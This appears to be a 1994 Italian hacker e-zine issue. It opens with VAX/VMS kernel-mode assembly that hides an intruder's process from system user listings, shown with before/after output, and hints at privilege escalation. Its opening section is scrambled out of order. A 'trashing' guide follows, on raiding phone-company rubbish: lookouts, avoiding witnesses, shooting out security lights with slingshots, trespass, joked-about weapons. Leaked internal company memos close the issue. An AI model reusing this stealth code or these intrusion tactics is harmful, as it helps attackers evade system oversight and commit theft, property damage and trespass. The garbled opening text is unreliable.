GRAZIE PIERGIORGIO! senza il quale non avrei avuto lo stimolo per imparare

link /SYS$SYSTEM:SYS.FINE ----------------------------------Mamma mia. lo e'.EXE"> : $ SH U/F VAX/VMS User Processes at 25-AUG-1994 05:50:59. e alla fine della trasmissione premete CTRL-Z.STB/ $pcbdef .MAR" perche'. sto sparando cazzate :)) Chiamero' questo programmino "MINCHIA. Per mandarlo su un vaxillo fate semplicemente un miserando $ CREATE MINCHIA.EXE.title "Minchia !!!" . Cosi' avrete il sorgente pronto per essere compilato coi seguenti schifosissimi comandi : $ MACRO MINCHIA $ LINK/NOMAP MINCHIA (il /NOMAP non e' proprio "necessario" se non ricordo male.pcb$l_sts(r4) VaiACagare: movl #ss$_normal.. esclamerete per l' appunto : "Minchia!!!" :) ----------------------------------INIZIO ----------------------------------. quando lo lancerete.entry Sucamela.pcb$l_sts(r4). basta va.entry Minchia. Esempio per deficenti : Supponiamo di avere un utenza "COGLIONAZZO" su un vaxillo. se lo lanciate otterrete qualcosa di carino.^m<> $cmkrnl_s routin=Sucamela ret . speriamo sia giusto se no finisce a figura di merda :) ("Figur'immierda" come dicono alcuni miei amici calabresi) A parte gli scherzi. Compiliamo MINCHIA.MAR Dopodiche' mandate il programmillo in ASCII.r0 ret . CON e SENZA :)) A questo punto avrete generato il programmino MINCHIA.73 .^m<> tstl pcb$l_owner(r4) bneq VaiACagare bbcc #pcb$v_inter.EXE e poi facciamo : ---------------.end Minchia ---------------------------------. pero' fa scena quindi ce lo metto :) provate un po' voi.certe cose stupende e meravigliose che popolano il ns cyberspazio cosi' martoriato da intemperie legali .MLB/ .VaiACagare clrb pcb$t_terminal(r4) decw g^sys$gw_ijobcnt bisl #pcb$m_noacnt.library /SYS$LIBRARY:LIB.<PRIMA DI AVER LANCIATO "MINCHIA.

NOTA : E' possibile inserire del codice per poter modificare questo semplice programmino e fargli fare cose piu' carine.P/P4-ORGASM. a verificare le devices LTA con SH DEV LTA per esempio (o altri devices) eccetera ..ora facciamo $ Run MINCHIA.Total number of users = 6.. Per fare cio' si deve scrivere in una tabella di simboli particolare (ovviamente in Assembler) che e' questa qua : Nome simbolico Locazione Uso Riferimento a -----------------------------------------------------------------------------CTL$GQ_PROCPRIV!P1 Pointer page !permanently enabled privs !SET UIC PHD$Q_AUTHPRIV !process header !procs allowable privs !$setprv .73 Total number of users = 5. number of processes = 9 Username ANALGAME COITUS COITUS COGLIONAZ POMPINO SPERM SPERM SYSTEM SYSTEM Process Name PID Terminal ANALGAME 00002760 LTA4574: COITUS 00001526 LTA4239: _LTA4342: 00001A50 LTA4342: COGLIONAZ 00002992 LTA4384: <<<<<<------. Se volete scoprire un utente che e' "MINCHIAto". Conviene allora rinominarlo con un nome che non dia nell'occhio tipo una coda di stampa : $ SET PROC /NAME=SYMBIONT_0002 a seconda di quali code di stampa gia' esistono.NOI *:] POMPINO 0000154F RTA9: (INGOIO::SMEGMA) SPERM 00002826 LTA4602: (DSV069/ORGASMATRON) SPERM_ 00002827 (subprocess of 00002826) BATCH_20 00002922 (batch) SYSTEM 00002734 LTA4559: (DSV913-FISTFUCK_2) ----. provate a esaminare i processi di sistema.e adesso :) $ SH U/F VAX/VMS User Processes at 25-AUG-1994 05:50:59. nell'elenco dei processi rimarra' il vostro processo base.) SPERM_ 00002827 (subprocess of 00002826) BATCH_20 00002922 (batch) SYSTEM 00002734 LTA4559: (DSV913-FISTFUCK_2) Minchia ! (ecco perche' l'ho chiamato cosi' :)))) siamo spariti dall'elenco utenti !!! Adesso con questo esempio da coglioni avete capito come fare :) (almeno si spera) Certo. come ad esempio ottenere privilegi superiori.EXE $ ----. number of processes = 9 Username ANALGAME COITUS COITUS POMPINO SPERM SPERM SYSTEM SYSTEM Process Name PID Terminal ANALGAME 00002760 LTA4574: COITUS 00001526 LTA4239: _LTA4342: 00001A50 LTA4342: POMPINO 0000154F RTA9: (INGOIO::SMEGMA) SPERM 00002826 LTA4602: (DSV069-9.

This mechanism is an escape that allows either VMS or user-written system services to acquire whatever privileges they need without regard for whether the calling process has SETPRV privilege. Vabbe'. fate delle prove coll' assembler dei Vax. If you do not specify a file type for an input file.. COL CAZZO CHE VI DICO COME SI FA ! :) Se siete bravi e avete a disposizione un vax vostro su cui sperimentare. ecco qui qualche stronzata di HELP sull'assembler vax.] Specifies one or more VAX MACRO assembly language source files to be assembled. 1)The process must have SETPRV privilege. If a file already exists with the same name as the object or listing file produced by the command. .. A process with this privilege can acquire any other privilege with either the set privilege system service or DCL command SET PROCESS/PRIVILEGES. 2)The system service was called from executive or kernal mode.dat !UAF allowable privs !LOGINOUT PHD$Q_PRIVMSK !process header !working privilege mask !system srvc's PCB$Q_PRIV !PCB !same as phd$q_privmsk !device driver -----------------------------------------------------------------------------Leggo proprio ora alcune fotocopie del "VAX/VMS internals and data structures" manual : -----If a process wishes a privilege that is not in its authorized list.. ---------------------------------------------------------------------MACRO Parameters file-spec[. visto che insistete. the files are concatenated and assembled as a single input file. If you separate the file specifications with commas.. You can specify more than one input file. -----E' altresi' necessario linkare la tabella dei simboli di sistema al nostro file oggetto. the assembler uses the default file type of MAR.STB. Such procedures must disable privileges granted in this fashion as part of their return path. each file is assembled separately. one of two conditions must hold or the requested privilege is not granted. Di solito e' SYS$SYSTEM:SYS.KFI$Q_PROCPRIV !priv install image!image installed with privs !image actvatr IHD$Q_PRIVREQS !image header !unused ..set for all privs! !image actvatr PHD$Q_IMAGPRIV !process header !mask for enhanced priv images!$setprv UAF$Q_PRIV !sysuaf. a new file with a version number one higher than the previously existing file will be created. producing single object and listing files. No wildcard characters are allowed in the file specifications. If you separate the file specifications with plus signs. Non ho fatto altro che prendere alcuni HELP online.

You can use these qualifiers in place of the /ENABLE and /DISABLE qualifiers. The /DEBUG or /NODEBUG qualifiers will override debugging characteristics set with the . codes. the default file type is ANA. and symbols Cross-references directives Cross-references macros Cross-references operation codes Cross-references registers Cross-references symbols operation If you specify more than one function. registers.])] /NOCROSS_REFERENCE (default) Controls whether a cross-reference listing is included in the listing file. it is equivalent to /CROSS_REFERENCE=(MACROS. macros. and whether traceback information is included in the object module. the default file name is the same as the source program. The analysis file is reserved for use with Digital layered products.. /DEBUG /DEBUG[=option] /NODEBUG (default) Controls whether local symbols are included in the symbol table. If you specify /CROSS_REFERENCE without any functions.. If the file-spec is omitted. the VAX Source Code Analyzer. .MACRO Qualifiers /ANALYSIS_DATA /ANALYSIS_DATA[=file-spec] /NOANALYSIS_DATA (default) Creates a file containing source code analysis information. The /CROSS_REFERENCE qualifier includes a cross-reference listing. The /NOCROSS_REFERENCE qualifier excludes the cross-reference listing..SYMBOLS). ALL DIRECTIVES MACROS OPCODES REGISTERS SYMBOLS Cross-references directives. but not limited to. such as. You can specify one or more of the functions listed below. separate them by commas and enclose the list in parentheses. when the DEBUG and TRACEBACK functions are used.DISABLE assembler directives. and therefore requires that you specify the /LIST qualifier to produce a listing file.ENABLE or . /CROSS_REFERENCE /CROSS_REFERENCE[=(function[. A cross-reference listing is a list of the places in the source file where the item specified is defined or referred to.

separate them by commas and enclose the list in parentheses. No traceback information is made available to the debugger. Specifying this qualifier is equivalent to specifying the qualifier /ENABLE=(DEBUG.. and all traceback information is provided in the object module for the debugger. the default file type is DIA. the default file name is the same as the source program. the VAX Language Sensitive Editor. The /NODISABLE qualifier has the same effect as not specifying the /DISABLE qualifier. The default is /DISABLE=(ABSOLUTE. .. No local symbols and no traceback information are made available to the debugger in the object module. but not limited to. ALL All local symbols are included in the symbol table.You can specify one or more of the functions listed below. If the file-spec is omitted. NONE SYMBOLS TRACEBACK /DIAGNOSTICS /DIAGNOSTICS[=file-spec] /NODIAGNOSTICS (default) Creates a file containing compiler messages and diagnostic information. /DISABLE /DISABLE=(function[. it is equivalent to /DEBUG=ALL. If you specify /DEBUG without any functions. or negates the effects of any /DISABLE qualifiers specified earlier on the command line. If you specify more than one function. All local symbols are made available to the debugger in the object module.TRACEBACK). Specifying this qualifier is equivalent to specifying the qualifier /DISABLE=(DEBUG. The diagnostics file is reserved for use with Digital layered products.DISABLE.]) /NODISABLE Provides initial settings for the functions controlled by the assembler directive .DEBUG. such as. See /ENABLE for a list of these functions.TRACEBACK). Traceback information is made available to the debugger in the object module.TRUNCATION). Specifying this qualifier is equivalent to specifying the qualifiers /ENABLE=TRACEBACK and /DISABLE=DEBUG. Specifying this qualifier is equivalent to specifying the qualifiers /ENABLE=DEBUG and /DISABLE=TRACEBACK. No local symbols are made available to the debugger..

When a macro call is issued in a source program. the assembler uses the default file type of MLB. If you specify more than one macro library in an assembly.. The /LIBRARY qualifier cannot be used with the /UPDATE qualifier./ENABLE /ENABLE=(function[. one of which is always STARLET. If you specify more than one function.. the libraries are searched in reverse order of their specification.. The /NOENABLE qualifier has the same effect as not specifying the /ENABLE qualifier.SUPPRESSION). in the reverse order in which they were specified). /LIBRARY /LIBRARY /NOLIBRARY Positional qualifier. The maximum number of libraries that can be searched in any given assembly is 16. You must specify at least one of the functions listed below.LIBRARY directive. any libraries specified in the DCL MACRO command line are then searched (again. If you do not specify a file type. separate them by commas and enclose the list in parentheses.TRACEBACK.]) /NOENABLE Provides initial settings for the functions controlled by the assembler directive . or negates the effects of any /ENABLE qualifiers specified earlier on the command line.LIBRARY directive are searched first. finally. any libraries specified with the . if the macro definition is not found in the . numbers are rounded) Assumption that undefined symbols in the assembly are external symbols Suppression of the listing of unreferenced symbols in the symbol table Provision of information to the debugger traceback mechanism The default is /ENABLE=(GLOBAL. in the reverse order in which they were declared.MLB. The /LIBRARY qualifier requires that the associated input file be a macro library. You can enable or disable: ABSOLUTE DEBUG TRUNCATION GLOBAL SUPPRESSION TRACEBACK Assembly of relative addresses addresses as absolute Inclusion of local symbol table information in the object file for use with the debugger Truncation of floating-point numbers (if truncation is disabled. if the macro definition is not found in any of the libraries specified with the .ENABLE.

. The default file type provided for listing files is LIS. . /LIST default. If you issue the MACRO command interactively. the listing level count is decremented. See the VMS DCL Concepts Manual for more information on entering output file qualifiers. /OBJECT /OBJECT[=file-spec] /NOOBJECT Controls whether an object module is created by the assembler.libraries specified in the command line. Since the /SHOW qualifier affects the listing. the listing level count is incremented. When /NOLIST is present. If you specify /NOSHOW without any functions. you can control the applied to the output file specification by the placement qualifier in the command. you must use the /LIST qualifier to produce a listing in order to use the /SHOW qualifier. When you specify /LIST.. You can specify one or more of the functions listed below.. /LIST /LIST[=file-spec] /NOLIST Controls whether an output listing is created.SHOW and . /SHOW /SHOW[=(function[.. No wildcard characters are allowed in the file specification.])] Provides initial settings for the functions controlled by the assembler directives . If you execute the MACRO command in a batch job. the assembler. either explicitly or by default. The default file type for object files is OBJ. or negates the effects of any /LIBRARY qualifiers specified earlier on the command line. It is the defaults of the for more By default. and optionally provides an output file specification for the listing file.MLB is searched. The /NOLIBRARY qualifier has the same effect as not specifying the /LIBRARY qualifier. No wildcard characters are allowed in the file specification. When you specify /OBJECT.NOSHOW. does not create a listing file. you can control the defaults applied to the output file specification by the placement of the qualifier in the command. the assembler creates an object module with the same file name as the first input file.]) /NOSHOW[=(function[. errors are reported on the current output device... also defines the file specification for the file. See the VMS DCL Concepts Manual information on entering output file qualifiers. STARLET. by default. If you specify /SHOW without any functions.

DEFINITIONS). The /UPDATE qualifier cannot be used with the /LIBRARY qualifier. /UPDATE /UPDATE[=(update-file-spec[. When multiple update files are specified with the /UPDATE qualifier.CONDITIONALS CALLS DEFINITIONS EXPANSIONS BINARY Lists unsatisfied conditional code associated with .. SLP. The /NOUPDATE qualifier has the same effect as not specifying the /UPDATE qualifier. the assembler merges the contents into a single list of updates before applying the updates to the source file. separate them by commas and enclose the list in parentheses. the default is equivalent to /SHOW=(CONDITIONALS. If you specify more than one function.. For additional details on these functions. the assembler prints an informational message but continues the assembly. You must separate multiple update files with commas and enclose the list in parentheses. The effects of the update appear in the compiled output. the assembler uses update files with the same name as the input source file and a file type of UPD.ENDC directives Lists macro calls and repeat range expansions Lists macro definitions Lists macro expansions Lists binary code generated by the expansion of macro calls If you omit the /SHOW qualifier. The /UPDATE qualifier requires usage with an associated input file that is to be updated with the specified update file or files. The listing also provides an audit trail of the changes if you specify /LIST with /UPDATE. to update the input file with the update file or files. MACRO . or negates the effects of any /UPDATE qualifiers specified earlier on the command line. The update process uses the batch editor. The input source file and update files are not changed by the update operation.])] /NOUPDATE Positional Qualifier.CALLS. By default.IF and .. If an update file is not found. see the VAX MACRO and Instruction Set Reference Volume. No wildcard characters are allowed in the update file specifications.

ASCIx . 3.IF_FALSE_(.IFTF) . $ MACRO ALPHA/LIST+MYLIB/LIBRARY$_ + [TEST]OLDLIB/LIBRARY + []BETA $ PRINT ALPHA The MACRO command concatenates the files ALPHA.MLB are searched for macro DELTA. The MACRO command assembles SUCCHIA. Then it assembles LYRA.OBJ and a listing file named ALPHA.GLOBAL_(. OLDLIB. TESTLIB.D_FLOATING_(. This MACRO command requests two separate and the system library STARLET. symbol control. if any.DISABLE_(.Examples 1. The alternate form.MLB (in the directory [TEST]) are specified as libraries to be searched for macro definitions.MAR and creates a listing file named LYRA.DEFAULT . instruction generation. for the definitions.LIS.IFT) .IF_TRUE_FALSE_(.ENABL) .MAR. LYRA/OBJECT=LYRAN This MACRO command requests two separate assemblies. MYLIB.ADDRESS . MYLIB. conditional and subconditional assembly.ERROR . program sectioning.GLOBL) .ENABLE_(.OBJ.ENDR . $ MACRO DELTA+TESTLIB/LIBRARY.IRP .MLB are searched for macro ALPHA.F_FLOATING_(.OBJ.ENDM .DEBUG .MLB are searched. listing control.LIS and SUCCHIA.MAR and BETA.DOUBLE) .ENTRY . $ MACRO/LIST SUCCHIA. location control.MAR.LIBRARY .IFF) .MAR and creates an object file named ANALSEX.IF . assembler option.EXTRN) .BYTE .LIS and an object module named LYRAN.G_FLOATING . $ MACRO ANALSEX The MACRO assembler assembles the file ORION.ALIGN .DSABL) . and linker option. The PRINT command prints the listing file ALPHA.H_FLOATING . ALPHA+MYLIB/LIBRARY assemblies.MAR. Additional information available: . message display.FLOAT) . data storage.END . in that order. and MYLIB.IIF .IF_TRUE_(.MLB definitions when macro calls are found in MACRO Directives The general assembler directives provide facilities for performing 11 types of functions.MLB (in the current default directory) and OLDLIB. and the system library STARLET. cross-reference.IDENT .BLKx . 2.IRPC .ENDC . When macro calls are found in BETA. 4.MAR to produce SUCCHIA.CROSS .LIS. the assembler also creates a listing file named ORION.MAR to produce an object file named ALPHA. routine entry point.MLB definitions when macro calls are found in and the system library STARLET.OBJ.LIS.EVEN . is given in parentheses.EXTERNAL_(. If this command is executed in a batch job.

REPEAT_(.OPDEF .SHOW_.RESTORE_PSECT_(.PACKED .NCHR . These operands specify the addressing mode for the instruction.REFn .RESTORE) .PRINT .SBTTL) .ODD .PSECT ._VBIS.TRANSFER .TITLE .QUAD ._and_VXOR VMUL VSUB VLD VSUBL VSL VMERGE VGATH VADD IOTA VST VCMP MFVP VSCAT VVCVT VADDL VDIV Autoincrement Autoincrement_deferred Register Immediate_or_Literal Indexed .REPT) .MDELETE .SUBTITLE_(.WORD AOBLxx BITx CMPx CVTTP INCx MFPR MULxx REMQTI SUBPx ASHx BLBx CMPCx DECx INDEX MNEGx MULP REMQUE SVPCTX Operands for instructions identify the memory locations or the registers that are used by the machine operation..NOSHOW .NARG .SIGNED_WORD .WARN MACRO Instructions Additional information available: ACBx ASHP BBxxI BPT CALLG CMPPx CVTLP DIVxx EMODx INSQHI JSB MOVx MOVPSL NOP PUSHAx RET SCANC TSTx MACRO Operand_Formats ADAWI Bxxxx BICxx BRx CALLS CMPxV CVTPL DIVP EMUL INSQTI LDPCTX MOVAx MOVTC POLYx PUSHL ROTL SKPC XFC ADDxx BBx BICPSW BSBx CASEx CRC CVTPS EDIV EXTxV INSQUE LOCC MOVCx MOVTUC POPR PUSHR RSB SOBGxx XORxx ADDPx BBxx BISxx BUGx CHMx CVTxx CVTPT EDITPC FFx INSV MATCHC MOVP MOVZxx PROBEx REI SBWC SPANC ADWC BISPSW CLRx CVTSP HALT JMP MCOMx MTPR REMQHI SUBxx .MASK .MEXIT .LONG .OCTA .MACRO . Additional information available: Absolute Autodecrement Branch Displacement Displacement_deferred General Register_deferred Relative Relative_deferred MACRO Vector_Instructions Additional information available: Assembler_Notation VCMPL VMULL VBIC.SIGNED_BYTE .NOCROSS .MCALL .SAVE) .NTYPE .WEAK .PAGE .SAVE_PSECT_(.LINK .

. come adesso. Io non credo di esser molto pratico visto ke l'ho fatto solo un paio di volte. in preda a strane visioni mistiche . ecc. Spero pero' di poter coinvolgere qualcuno che veramente se ne intende. mah) Nel prossimo numero di TBP probabilmente parleremo un po' di assembler vax. (Logico no ? e allora che cazzo scrivo . La posizione dove dovrai andare a far Trashing e' l'Ufficio di Scambio che e' qui' dove succede tutto.Numero 0.Articolo 6 DOVE/COME/QUANDO/PERCHE' FARE TRASHING Scritto da: ---------Ice MC ---------Con commenti della redazione by Dupree's Paradise Prefazione: ----------Questo testo contiene le basi del trashing. merdate simili o addirittura essere arrestato! [[ Nota della Redazione : Il testo e' stato pubblicato cosi' come ci e' pervenuto. Settembre 1994 . con una tazza di caffe' bollente e i nervi a fior di pelle :) Scusatemi se troverete questo articolo un po' merdoso. Lo scarto puo' essere abbastanza fruttuoso e divertente. Ma per me va benissimo cosi'. ma MOLTO in linea generale in quanto non sono per niente un esperto di questo argomento.. e' cercare . Lo scarto spesso contiene cose molto importanti che possono essere da blokki notes dell'ufficio per imparare ai nuovi operatori delle operazioni importanti (ad esempio. Nel prossimo paragrafo vedremo qualke suggerimento per eseguire quando o mentre si esegue un trashing.) a come funziona un telefono (schemi e cazzate simili)! In Aggiunta a quelle cose. comunque qui ci sono le basi! Trashing: Cos'e'? ----------------Il Trashing (scarto) e' l'azione della ricerca attraverso i rifiuti presi dai bidoni della SIP o di qualunque altro Ufficio Telefonico.. alle 6 del mattino come un coglione a non capire un cazzo di niente. si possono trovare anke elenchi telefonici. In fondo. invece di star qui da solo. il tracciamento di linea. chi se ne fotte ! :) Dupree's Paradise ----------------------------------------------------------------The Black Page . :) ]] Primo Passo: COME LOCALIZZARE IL BERSAGLIO -----------------------------------------Questo passo consiste nella scelta della posizione di dove far Trashing.S. basta ke venga fatto con attenzione senza prendere bicchieri di caffe'...MTVP VSYNC --------------------------------------------------------------------Dando un'okkiara all'HELP di MACRO troverete tutto l'HELP possibile su MACRO. Ice MC ci ha detto di averlo scritto durante una notte di insonnia totale. Il modo piu' facile per trovare l' U.

non potrete usare i sedili posteriori.. telefoni. Se dovete caricare 3 grossi sacchi su una Fiat Panda e siete in 4. ma meno di sei! Non andare mai a far trashing da solo.. la spazzatura degli Uffici di Scambi non viene gettato sotto l'edificio. fare prima e occultare di piu' la visuale. dove va la gente a Farsi Fottere i Soldi dal (Dis)Servizio di Stato. Fingete di guardare spesso l'orologio come se aveste un appuntamento . l'ideale e' essere in 2 persone. Ci vuole soprattutto pazienza. In alternativa c'e' sempre la Sede Centrale della Sip. insomma.. Mai guardare direttamente eventuali persone.parecchie antenne giganti. ]] Persone: Piu' di uno . questi hanno una sola porta centrale e nessuna finestra. dove cioe' vanno i clienti per stipulare contratti. merdate. Scendete dall'auto.. finche' le persone che possono vedervi mentre "agite" non se ne sono andate. mettetevi a chiacchierare come se niente fosse. acquistare cellulari. xche' no? . cioe' il famoso PONTE RADIO... Trovarlo e' molto semplice. E non portare mai piu' di cinque persone con te. Fate soprattutto attenzione non solo alla gente per la strada (dalle auto difficilmente si accorgono di cio' che fate) ma alla gente sui balconi dei palazzi che ha un'ottima visuale !!! Inoltre ricordate di posteggiare a circa 1 metro e mezzo dai cassonetti in modo da restare vicini. quindi e' piu' complicato... Certo. Abbonarsi a Itapac :-)) Un altro posto per fare trashing e' l'Ufficio di Smistamento dati.. una Station Vagon come quella di Amadeus e' l'ideale :))))) ]] Equipaggiamento: Secondo me non serve niente di speciale. se poi . o una sola porta e qualke finestra con 3000 sbarre (da non confondere con il carcere). Spesso nella stessa costruzione del Ponte Radio si trovano anche i Pad di ItaKaz quindi e' bene se si "trova" della spazzatura proveniente da li. vedere sei o sette persone con i sacchi in mano.. i luoghi migliori sono : La centrale che si occupa dello smistamento delle chiamate dei Cellulari. fumate una sigaretta.. e a volte.. potrebbero pensare a una rapina :-) Io raccomando di andare in tre. Cronometrando un'azione media si riesce a caricare tutto e ripartire.CONSIGLIATO ----------: ^ [[ NdR : Personalmente pensiamo che possa creare svariati problemi essere in piu' di 3 persone... ecco un piccolo schema: Numero di persone : 1 2 3 4 5 6 Persone per prendere i sacchi : 1 1 2 3 3 4 Persone per osservare in giro : 0 1 1 1 2 2 --------. con molta calma e decisione. in circa 12 secondi. disabilitare numeri. abbigliamento scuro e torce . Spesso i sacchi sono piu' di 4 .. Questo potrebbe dare un po' nell'okkio.. dove stanno gli uffici per noleggiare telefoni. ma e' utile x scappare velocemente ed e' molto meglio che camminare con 4 sacconi giganti :-)) [[ NdR : Meglio non dare nell'occhio. (non e' difficile. ]] Secondo Passo: EQUIPAGGIAMENTO -----------------------------Ecco una piccola lista dell'equipaggiamento che potresti prendere: Auto : Porte aperte e luci spente L'auto non e' necessaria. di solito stanno sopra i tetti :-)) Spesso pero' in alcune citta'. Io consiglio di andare alla sede centrale.. se no ci si fa accorgere che e' in preparazione qualcosa. [[ NdR : In poche parole..

Questa e' una parte molto pittoresca scritta dal nostro Ice MC. Per azioni Barbon-Style : ApeCar. si lanciano verso i cassonetti. molto accessibile a tutti) e pallini d'acciaio (gittata con tale fionda. A LUCI SPENTE. potenza di penetrazione : IMPRESSIONANTE). Uno si apposta alla macchina. Basta fingersi "barboni" o "robivecchi". su un Ape Car carico con un po' di scatoloni di cartone e rottami metallici. e in ogni caso reato. Annerire la faccia con un tappo di sughero bruciacchiato al fuoco. Fucili. e meglio se si puzza come porci. In tali casi alcune persone molto intraprendenti hanno spesso usato sistemi piu' avanzati. non indossare nessun oggetto luccicante. Vestiti trasandati. colpiscono ALCUNI dei fari di illuminazione. Con poche lire potrebbero convincersi a fare per voi il giro di ricerca. afferrano i sacchi (solitamente leggeri in quanto contengono rifiuti cartacei) ed escono rapidamente. Io credo che basti semplicemente un abbigliamento Scuro (niente abiti fluorescenti o cose spaziali :-)) EQUIPAGGIAMENTO AVANZATO: Maschera Guanti Walkie Talkies / CB Equipaggiamento Diversivo: Fumo.. Quindi aggiungiamo all'equipaggiamento avanzato : ------------------------------------------------Per azioni Commando-Style : Calzamaglia nera o abiti scuri e comodi come tute da ginnastica. Fionda da tiro professionale con fermabraccio e pallini di acciaio da tiro o sferette in vetro. Caricato tutto in macchina si riparte PIANO. un cortile interno recintato. barba lunga.. Nessuno rompe i coglioni a chi cerca di farsi una pagnotta rivendendo cartoni usati !!! Altro metodo : PAGARE uno di questi barboni per fare il sopracitato lavoro. Altro sistema : 2 persone vestite in modo molto trasandato.. In alcune centrali i rifiuti prima di uscire vengono TRITATI E DISTRUTTI in appositi distruggi-documenti o inceneritori. cercando di creare un corridoio oscuro per raggiungere la "spazzatura"). Non ci saranno problemi a prendere dei sacchi. con grossi fari a luce gialla e telecamere. A portata di mano in macchina tenete delle salviettine umidificate per ripulire il viso subito dopo l'azione. Bombe.s. In molte centrali la spazzatura sta ALL'INTERNO di recinti o di cortili delle costruzioni Sip.date un'okkiata all'equipaggiamento avanzato :-) . circa 200 metri o piu'. giornalmente. Fine nota della Redazione ]] Cosa Fare e Cosa NON Fare: . ma e' verosimile che qualche volta si incappi in qualche contrattempo. Pistole :-)) [[ Lunga nota della redazione : L'equipaggiamento. Creato il corridoio i 2 tipi in CALZAMAGLIA NERA e dalle provate capacita' atletiche. capelli sporchi. per poi accelerare DOPO aver riacceso le luci a debita distanza.credete di essere rambo. " partono verso il muretto. Immaginiamo uno scenario tipo. Quindi entrare in tali luoghi costituisce violazione di domicilio. Altri 2 armati di Fionda da tiro professionale (costa 50 mila lire. Gas. Bazzoka Se necessario porta anke qualke Mitra. p.

>Dopo aver preso i sacchi fai l'ordinamento a casa o in qualsiasi altro posto diversamente dal parkeggio dell'Ufficio. so' cazzi vostri!!! :-))))) Ice MC [[ NdR : Che dire ? Ci associamo ad Ice MC. un posto lontano da occhi indiscreti e dove sia possibile esaminare con calma ogni frammento cartaceo. ]] >Non usare l'Equipaggiamento Diversivo a meno che non sia davvero necessario. l'autore si declina da ogni responsabilita'. trovate qualke scusa del tipo. oppure dite che state cercando taccuini per la scuola. Mah ! Comunque sia e' stato molto divertente ! :)))) ]] ----------------------------------------------------------------The Black Page .. parlando di sicurezza. Un modo per evitare di farsi prendere e' fare il trashing di notte (tardi). non sapendo come abbia fatto a scrivere un testo del genere.. quindi per ora non possiamo controllare. in USA cio' costituisce violazione di domicilio. un garage con luce elettrica. non so nemmeno come ho fatto a scriverlo... Settembre 1994 . se vi capita di esser presi (toccando balle) ..Numero 0.... usate ad esempio una bomba contro la societa'telefonica .. [[ Traduzione : Cercate un posto tranquillo per esaminare i sacchi. >Non ti cagare addosso quando lo fai.------------------------->Fatelo di notte. Ma ai barboni che scavano nei cassonetti nessuno va a rompere i coglioni. abbandonare l'attivita' ]] >Non chiudere nessuno del gruppo in un bidone ! :-))) Parlando di Sicurezza/Polizia: -----------------------------Allora.Articolo 7 ============================================================================== -------------- . non so quali siano i pericoli del trashing visto che non sono mai stato preso :-) Comunque credo che non si possa rubare l'immondizia alle societa' telefoniche. una seconda casa vuota. che il vostro pallone e' andato a finire x caso dentro il bidone e lo state cercando. Vero e' che dovrebbe essere vietato appropriarsi della spazzatura. [[ NdR : In caso di cagata addosso.. Comunque. cio' significa che gran parte della roba sta FUORI DAL CASSONETTO e quindi trattasi di roba "trovata" :)) E vi assicuro che questo accade MOLTO SPESSO !!! ]] Conclusione: -----------Ke dire?!?!.. non kiedetemelo comunque. se dopo aver fatto trashing. Purtroppo nella ns sede non esiste alcun libro di legge. una villetta di un amico.. [[ NdR : Il problema legale e' una questione importante. E COMUNQUE SPESSO i cassonetti sono 2 soli per un quartiere intero.

700.000 in Sicilia (18% del totale. Cio' per evitare problemi sia a noi sia a chiunque possa sentirsi in qualche modo "disturbato" dal contenuto di cio' che seguira'.000 nel 1989) 1. Si riscontra dunque rispetto al 1989 un incremento del 40% circa. (276000) ed a Piemonte-Val d'Aosta (240000).000 nel Lazio (22% del totale. v.100.000 nel 1989) 1. 1.100.000 nel 1989) Se si considera il danno globale medio per singolo evento (rapporto ta subita e numero eventi) il primato negativo spetta ad altre DR. DANNI DIRETTI tra perdicioe' ad al Friuli della me- . 2. alla Liguria (276000 ad evento). danni ad apparecchi e cabine telefoniche) e 700 milioni per "danni indiretti" (mancati introiti). ============================================================================== Estratto da "Selezionando".400.g./----------------\ N. una perdita complessiva di circa 15 miliardi e 200 milioni.000. \____________/ o o Benvenuti all' ANGOLO SIP . Mensile aziendale della SIP Anno XII numero 2. 3. Distribuzione del fenomeno sul territorio ----------------------------------------Il fenomeno si e' manifestato quasi ovunque con perdite superiori al miliardo di lire. circa 14 miliardi e 500 milioni sono per "danni diretti" (furti di gettoni. U. Di questi.700.000 nel 1989) 2. 900.000 in Emilia Romagna (10% del totale. tutte al di sopra dia nazionale (207000).000 nel 1989) 1. Pressoche' invariato rispetto all'anno precedente e' rimasto invece il numero complessivo dei danneggiamenti (circa 109000) a dimostrazione di una maggiore pesantezza dei singoli atti.300. che si renderanno automaticamente evidenti nel contesto della lettura :).TELECOM _____/\----_____/\----_____/\----_____/\----- Notizie fresche di cassonetto a cura di Ice MC ============================================================================== Attenzione : In alcuni casi i documenti da noi pubblicati hanno subito delle "censure".000 in Toscana (600.300. Lo ha evidenziato l'elaboratore dei dati pervenuti dalle DR in una ricerca della Protezione Aziendale. Febbraio 1992 Pagina 20 I COSTI DEL VANDALISMO ====================== Nel 1990 la Sip ha subito.000 in Campania/Basilicata (11% del totale. Abruzzo-Molise (421000 ad evento). per furti ed atti di vandalismo alle apparecchiature telefoniche. Cifre x 1000 : 3.

100.000.000. CAUSE E SOLUZIONI ================= Il significativo incremento delle perdite complessive subite nel settore dell'Azienda e' dovuto all'elevato numero di danni agli apparecchi Rotor (520 circa nel 1989. Innanzitutto e' stata modificata la struttura dell'apparecchio (rafforzamento della piastra frontale dello sportello-cassaforte.TO NS.94 PROTOCOLLO :941700D54000612 SIGLA FUNZIONE EMITTENTE : IS RIF. un rilevante discapito all'immagine dell'azienda.------------I danni maggiori sono sati quelli relativi agli apparecchi telefonici (complessivamente 9. tutta la corrispondenza esterna (carta intestata. avendo cura di barrare il vecchio.000) con un incidenza massima di 2.p. sono state intraprese da parte dei settori competenti varie iniziative. ordinazioni.8. itinerari che includano localita' ove sono ubicate apparecchiature piu' frequentemente danneggiate.000 in Sicilia. inserimento di ganci di chiusura con perni di riscontro per lo sportello dell'apparecchio. montaggio di 2 serrature di sicurezza).100. Un'ultima soluzione : e' in corso uno studio diretto a valutare la possibilita' di dotare di allarme gli apparecchi telefonici piu' esposti. il protocollo per tutta la corrispondenza dovra' essere unico. e 1 miliardo nel Lazio. ---------------------------------------------------------------------------17.300.000 in Campania. e' inoltre in corso una costante sensibilizzazione delle forze dell'ordine (nel quadro dei rapporti sistematicamente intrattenuti) e dei gestori degli apparecchi.000. iniziando dal numero uno. Con plico a parte vi inviamo i timbri che dovranno essere usati in questa Legoland .) e le relative buste dovranno riportare il nuovo logo. oltre a perdite economiche di notevole portata. Per limitare il piu' possibile i danni che comportano. a partire dal 18/08/94.a In relazione alla nascita di TELECOM ITALIA vi informiamo che. per i servizi di Verifica dell'Efficienza della Protezione degli Impianti (VEPI). I furti di gettoni e monete hanno determinato un danno complessivo di circa 4 miliardi e 100 milioni. Il tutto per "ANNIENTARE" il vandalismo. sia l'accresciuta "specializzazione" degli autori di tali eventi criminosi. 